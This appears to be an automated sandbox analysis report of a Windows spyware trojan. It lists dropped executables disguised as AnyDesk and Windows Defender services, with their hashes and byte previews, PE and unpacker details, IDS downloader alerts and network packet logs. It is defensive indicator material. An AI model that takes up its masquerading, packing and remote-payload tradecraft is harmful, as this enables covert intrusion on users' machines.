                                                                                                    SSDEEP:1536:L3Yoj7FMTP8V98VHTXVAwkyUdUdTKtouDSeO6CfdRPGj6o8aCA:jYoj7FMTQ98VHTmwF7NKmueeCfHPGm6
                                                                                                    MD5:6E948E7425A1693B64951A8EB2A846C7
                                                                                                    SHA1:D12B91D1CFA5CEFC1EFE917F1B893BCCD1210896
                                                                                                    SHA-256:6D7DF6C7605316BE49804840649D26FF1FBD2F9208A0330EF87247920EDB93FE
                                                                                                    SHA-512:0DCCCB38E919A345DABEE0F40FCF526239EA6D3F4289FC16F5BF6C2BF73A5B564D643BCC522BB63B97E574F59D732640AFD8F20A98BCBDD10F2368E515BF8D3B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......tn.e0.s60.s60.s6{wp75.s6{wv7..s6{ww7:.s6 .p79.s6 .w7>.s6 .v7..s6{wr73.s60.r6i.s6x.z72.s6x..61.s60..61.s6x.q71.s6Rich0.s6........PE..d...<..f.........." ...)......... .......0................................................`.........................................................................................................................8...@...........................................UPX0..... ..............................UPX1.........0......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..

                                                                                                    C:\Windows\System32\WindowsUpdate.txt

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18
                                                                                                    Entropy (8bit):3.9477027792200903
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:WhXVXw6:WBVg6
                                                                                                    MD5:6C821BFDE63D9B4473563C6A3CB6E61B
                                                                                                    SHA1:3B0EC0C302AA7DEAE892825DE4CED93E4C5B7E55
                                                                                                    SHA-256:13DCA171E02A846B9203E79CBCEAF8F7F606ECB3BCDC814DDBE4665186087931
                                                                                                    SHA-512:CDEA2098CFFAD892642F77B59413844612759D1A65C2D6CF46F0F6C12E1CBCD31AC0D6D542F81671A8329306429D56999C8952F439BE4F8D4BC4741C78551AB6
                                                                                                    Malicious:false
                                                                                                    Preview:version=20240913..

                                                                                                    C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskShellIntegration[1].dll

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):54784
                                                                                                    Entropy (8bit):7.75347884612182
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:L3Yoj7FMTP8V98VHTXVAwkyUdUdTKtouDSeO6CfdRPGj6o8aCA:jYoj7FMTQ98VHTmwF7NKmueeCfHPGm6
                                                                                                    MD5:6E948E7425A1693B64951A8EB2A846C7
                                                                                                    SHA1:D12B91D1CFA5CEFC1EFE917F1B893BCCD1210896
                                                                                                    SHA-256:6D7DF6C7605316BE49804840649D26FF1FBD2F9208A0330EF87247920EDB93FE
                                                                                                    SHA-512:0DCCCB38E919A345DABEE0F40FCF526239EA6D3F4289FC16F5BF6C2BF73A5B564D643BCC522BB63B97E574F59D732640AFD8F20A98BCBDD10F2368E515BF8D3B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......tn.e0.s60.s60.s6{wp75.s6{wv7..s6{ww7:.s6 .p79.s6 .w7>.s6 .v7..s6{wr73.s60.r6i.s6x.z72.s6x..61.s60..61.s6x.q71.s6Rich0.s6........PE..d...<..f.........." ...)......... .......0................................................`.........................................................................................................................8...@...........................................UPX0..... ..............................UPX1.........0......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..

                                                                                                    C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskUpdateService[1].exe

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):161792
                                                                                                    Entropy (8bit):7.874759486819471
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:s3pAiuZ03rXGkMTCyymEUoRBiaQaS/dqG9fvX7ZYl3QamlPx6AkyWx:obuZ6rXRW/HRag/dqs7ZCQ5Z6Ak/
                                                                                                    MD5:95408095927F78DEFFAEB9CB1F4CD44D
                                                                                                    SHA1:5E98F7CC5B8BCE4DCEFDDC0313FE1CCC15FFE08C
                                                                                                    SHA-256:0C7B1DAFED4420AAB551544F4CA8813F1556E19442F75046B00BB0C952215456
                                                                                                    SHA-512:B415F4C6D87A3A609FB554E4EE0AF4F27AC8F954E85DAADA7D3034134A5A24B71401819D702F45E24AECE4183059149C56D0936AC25DD4C5A106DC3FD09D1A81
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 32%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\...=...=...=...E...=...E...=...E...=......=......=......=...E...=...=..C=.......=...._..=...=7..=.......=..Rich.=..........PE..d...L..f.........."....).p.......P.......`.....@..........................................`.................................................h...\.......h....`..L,.................................................. ...@...........................................UPX0.....P..............................UPX1.....p...`...l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..

                                                                                                    C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18
                                                                                                    Entropy (8bit):3.9477027792200903
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:WhXVXw6:WBVg6
                                                                                                    MD5:6C821BFDE63D9B4473563C6A3CB6E61B
                                                                                                    SHA1:3B0EC0C302AA7DEAE892825DE4CED93E4C5B7E55
                                                                                                    SHA-256:13DCA171E02A846B9203E79CBCEAF8F7F606ECB3BCDC814DDBE4665186087931
                                                                                                    SHA-512:CDEA2098CFFAD892642F77B59413844612759D1A65C2D6CF46F0F6C12E1CBCD31AC0D6D542F81671A8329306429D56999C8952F439BE4F8D4BC4741C78551AB6
                                                                                                    Malicious:false
                                                                                                    Preview:version=20240913..

                                                                                                    C:\Windows\System32\oobe\AnyDeskCrashHandler.exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60416
                                                                                                    Entropy (8bit):7.756024662478089
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:td3pwkJ+vSKrCdQN8ZAO/IYeBcWCgTumOC9N9b:TpwkAEQN8ZAOAYs2gTumOCJ
                                                                                                    MD5:8EB4565C6C7096C17AC94718B2A3724B
                                                                                                    SHA1:1BCEC351F712F041E4B23545E9A14C421EFFCFD3
                                                                                                    SHA-256:C700DC3BB675FB60DD69D26ED9628616C97B64AF7FAAEFF92F6C65E7F4F2B8FE
                                                                                                    SHA-512:5BA97CE8B19EFA125EFB40AAE9B1E1C9FB6A7E45B9261BD8327988C8C5474A5E27AACE3E0CA77A0767740CAEB7BF2060490DC77DEBA7EEE474F6F3A998B1F0A6
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................?..........g.....g.....g....................f......f......F.....f.....Rich....................PE..d...y..f.........."....).........P...:...`.....@.............................P............`.................................................@E.......@..@.......\........... F.......................................<..@...........................................UPX0.....P..............................UPX1.........`......................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..

                                                                                                    C:\Windows\System32\oobe\AnyDeskUpdateService.exe

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):161792
                                                                                                    Entropy (8bit):7.874759486819471
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:s3pAiuZ03rXGkMTCyymEUoRBiaQaS/dqG9fvX7ZYl3QamlPx6AkyWx:obuZ6rXRW/HRag/dqs7ZCQ5Z6Ak/
                                                                                                    MD5:95408095927F78DEFFAEB9CB1F4CD44D
                                                                                                    SHA1:5E98F7CC5B8BCE4DCEFDDC0313FE1CCC15FFE08C
                                                                                                    SHA-256:0C7B1DAFED4420AAB551544F4CA8813F1556E19442F75046B00BB0C952215456
                                                                                                    SHA-512:B415F4C6D87A3A609FB554E4EE0AF4F27AC8F954E85DAADA7D3034134A5A24B71401819D702F45E24AECE4183059149C56D0936AC25DD4C5A106DC3FD09D1A81
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 32%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\...=...=...=...E...=...E...=...E...=......=......=......=...E...=...=..C=.......=...._..=...=7..=.......=..Rich.=..........PE..d...L..f.........."....).p.......P.......`.....@..........................................`.................................................h...\.......h....`..L,.................................................. ...@...........................................UPX0.....P..............................UPX1.....p...`...l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..

                                                                                                    C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):143872
                                                                                                    Entropy (8bit):7.873862373980263
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:3fTw5T+B1/TPchSZzA5+fOZmaIJhWLQkD7V2EO0EnGfz9:3U5T+B1LkhSROZmRQLQkDRPEG
                                                                                                    MD5:9CEBC167FF7C8AE3CCFFB718FD7B52D0
                                                                                                    SHA1:8F5FA44298E5498D1CA696DC909093E26F4B5661
                                                                                                    SHA-256:EA5CD105B600E7606DE1CBCFE813A7845A3BE878B1E85DBC686871356FAAAC29
                                                                                                    SHA-512:CED1F79DD967CBBFEA8D08768EEBD8BD1B319B6EE5726BCF097AE375001DBF86C9A703CE7821468351CCC453C261598C6AC69EB9EB2420E72C3BDD33C3E57C5D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........7..od..od..od..le..od..je..od..ke..od..le..od..ke..od..je.od..ne..od..nd.od..fe..od...d..od...d..od..me..odRich..od........................PE..d...]..f.........."....).0...........!.........@.............................@............`................................................. 6..\....0.. ........&..........|7.......................................$..@...........................................UPX0....................................UPX1.....0.......&..................@....rsrc........0.......*..............@..............................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..

                                                                                                    C:\Windows\System32\oobe\version.txt

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18
                                                                                                    Entropy (8bit):3.9477027792200903
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:WhXVXw6:WBVg6
                                                                                                    MD5:6C821BFDE63D9B4473563C6A3CB6E61B
                                                                                                    SHA1:3B0EC0C302AA7DEAE892825DE4CED93E4C5B7E55
                                                                                                    SHA-256:13DCA171E02A846B9203E79CBCEAF8F7F606ECB3BCDC814DDBE4665186087931
                                                                                                    SHA-512:CDEA2098CFFAD892642F77B59413844612759D1A65C2D6CF46F0F6C12E1CBCD31AC0D6D542F81671A8329306429D56999C8952F439BE4F8D4BC4741C78551AB6
                                                                                                    Malicious:false
                                                                                                    Preview:version=20240913..

                                                                                                    \Device\ConDrv

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\oobe\AnyDeskUpdateService.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29
                                                                                                    Entropy (8bit):4.181786496009062
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:FERMXjGISn:FERMXjGj
                                                                                                    MD5:4142CCE96C2B3EA0DDC84BCCCE8FAF6F
                                                                                                    SHA1:9D5D21B3007BCEBF8B7ACFC5134AE700F22BC9C4
                                                                                                    SHA-256:957DF422654DEF55082544422F1C2E927CD231F78E6F5E11CA7B0EB20DB2483C
                                                                                                    SHA-512:DF18B0321410A9C506EF87944E62086DA0E0EFED1EB5B41AAA471E628DB6917B725B2DF4288C1D6F29D4236FEA6F4B3ED515AF71433CA39E07B4AFDAA0691AA6
                                                                                                    Malicious:false
                                                                                                    Preview:CreateService failed (1073)..

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                    Entropy (8bit):7.874759486819471
                                                                                                    TrID:
                                                                                                    • Win64 Executable Console (202006/5) 81.26%
                                                                                                    • UPX compressed Win32 Executable (30571/9) 12.30%
                                                                                                    • Win64 Executable (generic) (12005/4) 4.83%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.81%
                                                                                                    • DOS Executable Generic (2002/1) 0.81%
                                                                                                    File name:SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    File size:161'792 bytes
                                                                                                    MD5:95408095927f78deffaeb9cb1f4cd44d
                                                                                                    SHA1:5e98f7cc5b8bce4dcefddc0313fe1ccc15ffe08c
                                                                                                    SHA256:0c7b1dafed4420aab551544f4ca8813f1556e19442f75046b00bb0c952215456
                                                                                                    SHA512:b415f4c6d87a3a609fb554e4ee0af4f27ac8f954e85daada7d3034134a5a24b71401819d702f45e24aece4183059149c56d0936ac25dd4c5a106dc3fd09d1a81
                                                                                                    SSDEEP:3072:s3pAiuZ03rXGkMTCyymEUoRBiaQaS/dqG9fvX7ZYl3QamlPx6AkyWx:obuZ6rXRW/HRag/dqs7ZCQ5Z6Ak/
                                                                                                    TLSH:2CF3126CC2FC18BFFA96CE34913886947150B6FD2D3CB970981A0CB96972FB5A4C4246
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\...=...=...=...E...=...E...=...E...=.......=.......=.......=...E...=...=..C=.......=...._..=...=7..=.......=..Rich.=.........

                                                                                                    File Icon

                                                                                                    Icon Hash:00928e8e8686b000

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x14005c7b0
                                                                                                    Entrypoint Section:UPX1
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x140000000
                                                                                                    Subsystem:windows cui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x66E3874C [Fri Sep 13 00:29:00 2024 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:6
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:6
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:6
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:973629af63bcb766c16760645e060863

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    push ebx
                                                                                                    push esi
                                                                                                    push edi
                                                                                                    push ebp
                                                                                                    dec eax
                                                                                                    lea esi, dword ptr [FFFD9845h]
                                                                                                    dec eax
                                                                                                    lea edi, dword ptr [esi-00035000h]
                                                                                                    push edi
                                                                                                    xor ebx, ebx
                                                                                                    xor ecx, ecx
                                                                                                    dec eax
                                                                                                    or ebp, FFFFFFFFh
                                                                                                    call 00007FF0E8C52C45h
                                                                                                    add ebx, ebx
                                                                                                    je 00007FF0E8C52BF4h
                                                                                                    rep ret
                                                                                                    mov ebx, dword ptr [esi]
                                                                                                    dec eax
                                                                                                    sub esi, FFFFFFFCh
                                                                                                    adc ebx, ebx
                                                                                                    mov dl, byte ptr [esi]
                                                                                                    rep ret
                                                                                                    dec eax
                                                                                                    lea eax, dword ptr [edi+ebp]
                                                                                                    cmp ecx, 05h
                                                                                                    mov dl, byte ptr [eax]
                                                                                                    jbe 00007FF0E8C52C13h
                                                                                                    dec eax
                                                                                                    cmp ebp, FFFFFFFCh
                                                                                                    jnbe 00007FF0E8C52C0Dh
                                                                                                    sub ecx, 04h
                                                                                                    mov edx, dword ptr [eax]
                                                                                                    dec eax
                                                                                                    add eax, 04h
                                                                                                    sub ecx, 04h
                                                                                                    mov dword ptr [edi], edx
                                                                                                    dec eax
                                                                                                    lea edi, dword ptr [edi+04h]
                                                                                                    jnc 00007FF0E8C52BE1h
                                                                                                    add ecx, 04h
                                                                                                    mov dl, byte ptr [eax]
                                                                                                    je 00007FF0E8C52C02h
                                                                                                    dec eax
                                                                                                    inc eax
                                                                                                    mov byte ptr [edi], dl
                                                                                                    sub ecx, 01h
                                                                                                    mov dl, byte ptr [eax]
                                                                                                    dec eax
                                                                                                    lea edi, dword ptr [edi+01h]
                                                                                                    jne 00007FF0E8C52BE2h
                                                                                                    rep ret
                                                                                                    cld
                                                                                                    inc ecx
                                                                                                    pop ebx
                                                                                                    jmp 00007FF0E8C52BFAh
                                                                                                    dec eax
                                                                                                    inc esi
                                                                                                    mov byte ptr [edi], dl
                                                                                                    dec eax
                                                                                                    inc edi
                                                                                                    mov dl, byte ptr [esi]
                                                                                                    add ebx, ebx
                                                                                                    jne 00007FF0E8C52BFCh
                                                                                                    mov ebx, dword ptr [esi]
                                                                                                    dec eax
                                                                                                    sub esi, FFFFFFFCh
                                                                                                    adc ebx, ebx
                                                                                                    mov dl, byte ptr [esi]
                                                                                                    jc 00007FF0E8C52BD8h
                                                                                                    lea eax, dword ptr [ecx+01h]
                                                                                                    jmp 00007FF0E8C52BF9h
                                                                                                    dec eax
                                                                                                    inc ecx
                                                                                                    call ebx
                                                                                                    adc eax, eax
                                                                                                    inc ecx
                                                                                                    call ebx
                                                                                                    adc eax, eax
                                                                                                    add ebx, ebx
                                                                                                    jne 00007FF0E8C52BFCh
                                                                                                    mov ebx, dword ptr [esi]
                                                                                                    dec eax
                                                                                                    sub esi, FFFFFFFCh
                                                                                                    adc ebx, ebx
                                                                                                    mov dl, byte ptr [esi]
                                                                                                    jnc 00007FF0E8C52BD6h
                                                                                                    sub eax, 03h
                                                                                                    jc 00007FF0E8C52C0Bh
                                                                                                    shl eax, 08h
                                                                                                    movzx edx, dl
                                                                                                    or eax, edx
                                                                                                    dec eax
                                                                                                    inc esi
                                                                                                    xor eax, FFFFFFFFh
                                                                                                    je 00007FF0E8C52C4Ah
                                                                                                    sar eax, 1

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5d5680x15c.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x568.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x560000x2c4cUPX1
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x5d6c40x1c.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5ca200x140UPX1
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    UPX00x10000x350000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    UPX10x360000x270000x26c000888333fe4cd72bfbf9e088b129d7a25False0.9775138608870968data7.898224932558204IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .rsrc0x5d0000x10000x80002fc1f9ef7e167d34be2dadcdacb1256False0.404296875data3.8464319187138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_VERSION0x5d0a40x340dataEnglishUnited States0.43028846153846156
                                                                                                    RT_MANIFEST0x5d3e80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                    Imports

                                                                                                    DLLImport
                                                                                                    ADVAPI32.dllReportEventW
                                                                                                    KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                                                                                                    SHELL32.dllShellExecuteExW
                                                                                                    WININET.dllInternetOpenW

                                                                                                    Possible Origin

                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                    EnglishUnited States

                                                                                                    Network Behavior

                                                                                                    Suricata IDS Alerts

                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-09-29T02:26:01.082281+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649710185.199.110.153443TCP
                                                                                                    2024-09-29T02:26:01.175695+02002001046ET MALWARE UPX compressed file download possible malware3185.199.110.153443192.168.2.649710TCP
                                                                                                    2024-09-29T02:26:01.872232+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649711185.199.110.153443TCP
                                                                                                    2024-09-29T02:26:01.965049+02002001046ET MALWARE UPX compressed file download possible malware3185.199.110.153443192.168.2.649711TCP
                                                                                                    2024-09-29T02:26:02.740638+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649712185.199.110.153443TCP
                                                                                                    2024-09-29T02:26:02.839748+02002001046ET MALWARE UPX compressed file download possible malware3185.199.110.153443192.168.2.649712TCP
                                                                                                    2024-09-29T02:26:09.596623+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649714185.199.110.153443TCP
                                                                                                    2024-09-29T02:26:10.202534+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649715185.199.110.153443TCP
                                                                                                    2024-09-29T02:26:10.297385+02002001046ET MALWARE UPX compressed file download possible malware3185.199.110.153443192.168.2.649715TCP
                                                                                                    2024-09-29T02:26:11.082553+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649717185.199.110.153443TCP
                                                                                                    2024-09-29T02:26:11.170934+02002001046ET MALWARE UPX compressed file download possible malware3185.199.110.153443192.168.2.649717TCP
                                                                                                    2024-09-29T02:26:17.685412+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649721185.199.110.153443TCP
                                                                                                    2024-09-29T02:26:24.719024+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649724185.199.110.153443TCP
                                                                                                    2024-09-29T02:26:31.217086+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649725185.199.110.153443TCP
                                                                                                    2024-09-29T02:26:37.673371+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649726185.199.110.153443TCP
                                                                                                    2024-09-29T02:26:44.000738+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649728185.199.110.153443TCP
                                                                                                    2024-09-29T02:26:50.547457+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649729185.199.110.153443TCP
                                                                                                    2024-09-29T02:26:56.517807+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649731185.199.110.153443TCP
                                                                                                    2024-09-29T02:27:02.499688+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649733185.199.110.153443TCP
                                                                                                    2024-09-29T02:27:08.462279+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649734185.199.110.153443TCP
                                                                                                    2024-09-29T02:27:14.453356+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649735185.199.110.153443TCP
                                                                                                    2024-09-29T02:27:20.468666+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649736185.199.110.153443TCP
                                                                                                    2024-09-29T02:27:26.655782+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649737185.199.110.153443TCP
                                                                                                    2024-09-29T02:27:32.889465+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649739185.199.110.153443TCP
                                                                                                    2024-09-29T02:27:39.281130+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649740185.199.110.153443TCP
                                                                                                    2024-09-29T02:27:45.756534+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649741185.199.110.153443TCP
                                                                                                    2024-09-29T02:27:52.185949+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649742185.199.110.153443TCP
                                                                                                    2024-09-29T02:27:58.464364+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649743185.199.110.153443TCP
                                                                                                    2024-09-29T02:28:04.777993+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649744185.199.110.153443TCP

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Sep 29, 2024 02:26:00.399130106 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:00.399188042 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:00.399281979 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:00.409811974 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:00.409837008 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:00.866276979 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:00.866374016 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:00.927198887 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:00.927243948 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:00.927614927 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:00.927675009 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:00.929698944 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:00.971412897 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.082303047 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.082370043 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.082396984 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.082411051 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.082427025 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.082437992 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.082462072 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.082492113 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.082509041 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.082551003 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.082559109 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.082603931 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.089378119 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.089438915 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.089459896 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.089481115 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.089493990 CEST49710443192.168.2.6185.199.110.153
